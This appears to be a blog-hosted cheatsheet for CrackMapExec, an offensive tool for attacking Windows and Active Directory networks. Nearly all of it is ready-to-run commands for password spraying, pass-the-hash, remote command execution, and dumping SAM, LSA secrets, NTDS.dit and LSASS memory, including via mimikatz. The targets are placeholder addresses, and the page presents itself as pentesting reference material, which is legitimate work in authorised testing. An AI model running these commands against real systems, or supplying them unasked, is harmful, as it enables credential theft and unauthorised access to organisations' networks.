Keyboard shortcuts

Press โ† or โ†’ to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

๐Ÿ  Back to Blog

CrackMapExec (CME) Cheatsheet

Swiss army knife for pentesting Windows/AD environments.

Basic Syntax

crackmapexec <protocol> <target> [options]

Protocols: smb, ldap, mssql, ssh, winrm, rdp, ftp

Target Specification

FormatExample
Single IP10.10.10.10
CIDR range10.10.10.0/24
IP range10.10.10.1-50
Filetargets.txt
Hostnamedc01.domain.local

Authentication Options

OptionDescriptionExample
-u USERUsername or file-u admin or -u users.txt
-p PASSPassword or file-p Password123 or -p passwords.txt
-H HASHNTLM hash-H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
-d DOMAINDomain-d MYDOMAIN
--local-authLocal authenticationFor non-domain joined machines
-kKerberos authUses ccache from KRB5CCNAME

SMB Operations

Check Access

crackmapexec smb 10.10.10.10 -u admin -p Password123

Output indicators:

  • [+] - Success
  • [-] - Failure
  • (Pwn3d!) - Admin access

Enumerate Shares

crackmapexec smb 10.10.10.10 -u admin -p Password123 --shares

List Share Contents

crackmapexec smb 10.10.10.10 -u admin -p Password123 --spider C$ --depth 2

Enumerate Users

crackmapexec smb 10.10.10.10 -u admin -p Password123 --users

Enumerate Groups

crackmapexec smb 10.10.10.10 -u admin -p Password123 --groups

Enumerate Logged-on Users

crackmapexec smb 10.10.10.0/24 -u admin -p Password123 --loggedon-users

Enumerate Sessions

crackmapexec smb 10.10.10.10 -u admin -p Password123 --sessions

Password Spraying

Single Password Against User List

crackmapexec smb 10.10.10.10 -u users.txt -p 'Company01!' --continue-on-success

With Local Auth

crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123!' --local-auth

Command Execution

OptionDescription
-x CMDExecute CMD command
-X CMDExecute PowerShell command
--exec-methodMethod: smbexec, atexec, wmiexec, mmcexec

Execute CMD

crackmapexec smb 10.10.10.10 -u admin -p Password123 -x 'whoami'

Execute PowerShell

crackmapexec smb 10.10.10.10 -u admin -p Password123 -X 'Get-Process'

Specify Execution Method

crackmapexec smb 10.10.10.10 -u admin -p Password123 -x 'ipconfig' --exec-method smbexec

Credential Dumping

Dump SAM

crackmapexec smb 10.10.10.10 -u admin -p Password123 --sam

Dump LSA Secrets

crackmapexec smb 10.10.10.10 -u admin -p Password123 --lsa

Dump NTDS.dit (Domain Controller)

crackmapexec smb dc01 -u admin -p Password123 --ntds

Dump LSASS

crackmapexec smb 10.10.10.10 -u admin -p Password123 -M lsassy

Pass-the-Hash

crackmapexec smb 10.10.10.10 -u admin -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'

Modules

List available modules:

crackmapexec smb -L

Run a module:

crackmapexec smb 10.10.10.10 -u admin -p Password123 -M <module>

Common modules:

  • lsassy - Dump LSASS
  • mimikatz - Run Mimikatz
  • spider_plus - Spider shares
  • enum_av - Enumerate AV products
  • gpp_password - Find GPP passwords

Database

CME stores results in a database:

cmedb

Database commands:

  • hosts - Show discovered hosts
  • creds - Show captured credentials
  • export - Export data

Useful Flags

FlagDescription
--continue-on-successDonโ€™t stop after first valid cred
--no-bruteforceAvoid brute force attempts
-vVerbose output
--gen-relay-list FILEGenerate list of hosts with SMB signing disabled